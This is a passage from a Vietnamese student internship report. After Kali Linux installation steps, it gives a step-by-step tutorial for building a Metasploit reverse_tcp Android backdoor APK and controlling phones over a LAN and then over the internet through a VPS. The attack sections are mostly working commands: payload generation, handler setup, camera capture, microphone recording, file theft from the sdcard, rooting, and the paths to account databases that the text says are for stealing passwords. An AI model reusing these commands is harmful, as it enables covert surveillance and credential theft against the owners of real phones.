dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng

không phải cài lại mới hoàn toàn nữa

5.2 Cài đặt Kali Linux trên máy ảo VMWare

- Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài

này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit.

http://www.kali.org/downloads/

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 25

- Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể

tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.

- Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... .

Trên cửa sổ mới mở, chọn custom và nhấn next

- Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đa tải trước đó:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 26

- Đặt tên và đặt đường dẫn cho máy ảo

- Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định.

- Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 27

- Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình

thường...

- Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!

- Phần Partition chọn Guided – use entire disk và All files in one partition

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 28

- Chọn Finish partitioning and write changes to disk

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 29

- Chọn Yes

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 30

- Nhấn continue để bắt đầu cài đặt khoảng 15 phút.

- Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 31

- Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root

và password đã đặt ở phần trước.

- Vậy là ta đa hoàn tất cài đặt kali linux trên Vmware

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 32

5.3 Tạo mã độc trên Kali Linux để xâm nhập Android

- Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy

android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy

ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

- Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware

- Bấm vào Network Adapter và chọn Bridged: connection directly to the physical

network

- Bấm vào Edit -> Virtual Network Editor...

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 33

- Trên phần Bridge (connect VMs directly to the external network) chọn adapter

của máy thật

- Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở terminal và gõ dòng lệnh

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 34

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104

lport=8080 R > /root/Desktop/files.apk

192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem

IP của máy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng

- Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một

Metasploit reverse tcp backdoor.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 35

- Tiếp theo, gõ lệnh msfconsole

- Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách

gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080– nhập port giống với port khi tạo payload ở trên.

Exploit

- Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 36

- Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao

diện như dưới, nhấp vào nút reverse_tcp:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 37

- Vậy là ta đa kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 38

- Để xem thông tin về máy, nhập lệnh SysInfo

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

- Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh

sách camera ở phần trước. Ví dụ như sau:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 39

- File hình đa chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của

máy

Ghi âm

- Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 40

Lấy file từ sd card

- Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục

- Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 41

- Dùng lệnh cd /sdcard/Download để vào thư mục

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 42

- Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

- Và file này sẽ được tải về thư mục root của máy Kali

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 43

II. Thực hiện trên môi trường internet

1.Cài mã độc trên VPS

1.1 Giới thiệu Metasploit lên VPS

- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,

tấn công và khai thác lỗi của các service.Metasploit được xây dựng từ ngôn ngữ hướng

đối tượng Perl, với những components được viết bằng C, assembler, và Python.

Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.

1.2 Cài đặt

- Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community.Ta chọn

phiên bản Community miễn phí và dùng cho nghiên cứu.

--

- Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm

khác.

Chọn folder cài đặt:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 44

- Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:

- Chọn server và ngày hết hạn, để mặc định:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 45

- Quá trình cài đặt của Metasploit:

- Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 46

- Sau khi Finish trình duyệt web mở lên và đi tới giao diện

- Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào

Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn

Create Account:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 47

- Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi

miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:

2.Từ VPS điều khiển thiết bị qua internet

Các bước thực hiện

1. Sử dụng Kali Linux để tạo file APK làm backdoor để

hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 48

- Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp

lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk”ở đây địa chỉ VPS

là 14.0.21.132

2. Khởi động Metasploit Console trên VPS

3. Chúng ta thực hiện các bước xâm nhập như đa đề cập ở

phần trên, ở đây chỉ khác là sử dụng chính IP của VPS

4. Sau khi máy nạn nhân tải về file apk đa được tạo ra, máy android đó

sẽ bị hack

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 49

5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ

Để xem các lệnh ta gõ help

Để xem thông tin về máy, nhập lệnh SysInfo

Để xem các tác vụ đang chạy gõ ps

Xem ip gõ ipconfig

Xem danh sách thư mục, file gõ ls

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 50

• Sử dụng camera:

- Để xem danh sách camera, nhập webcam_list

- Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh

sách camera ở phần trước.

• Ghi âm

- Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

• Lấy file từ sd card

- Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Dùng lệnh cd /sdcard/Download để vào thư mục

- Để tải về máy, ta nhập lệnh

Download App.apk

- Để upload gõ lệnh: upload

Và file này sẽ được tải về thư mục root của máy Kali

- Gõ shell để vào lệnh

- Kiểm tra xem có root chưa gõ

su

whoami

- Nếu báo unknown id is 0 tức là đa root

ls -l danh mục file và các quyền

cd để chuyển hướng thư mục

- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

- Để xem danh sách và down load các file hay thay đổi các file trong ROM

+ Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

+ Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 51

^C để quay lại

- Sử dụng SQLite để mở file db

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 52

III. Tông kêt:

Kết quả đạt được:

Link “slideshare” và “youtube”

Báo cáo tuần 1:

- Link slideshare: http://www.slideshare.net/lanhle524/hng-dn-cai-t-kali-linux-trn-may-ao-vmwaredocx

- Link youtube: https://www.youtube.com/watch?v=xk9q9yaiiXE&feature=youtu.be

Báo cáo tuần 2:

- Link slideshare: http://www.slideshare.net/lanhle524/tao-ma-c-trn-kali-linux-thm-nhp-android

- Link youtube: https://www.youtube.com/watch?v=cswPjYZLhWU&feature=youtu.be

Báo cáo tuần 3:

- Link slideshare: http://www.slideshare.net/lanhle524/baibaocao3

- Link youtube: https://www.youtube.com/watch?v=Nv4tesZKld0

Báo cáo tuần 4:

- Link slideshare: http://www.slideshare.net/lanhle524/baibaocao4-140810141923phpapp02 - Link youtube: https://www.youtube.com/watch?v=yBFbKMYHsSI&feature=youtu.be

Báo cáo giữa kì:

- Link slideshare: http://www.slideshare.net/lanhle524/bao-cao-giua-ki-39850065

Báo cáo cuối kì:

- Link slideshare:

Giới thiệu bản thân:

- Link youtube: https://www.youtube.com/watch?v=TsgYFipDoyk&feature=youtu.be

Thuận lợi – khó khăn:

- Link youtube: https://www.youtube.com/watch?v=XQsUt8uZ1pU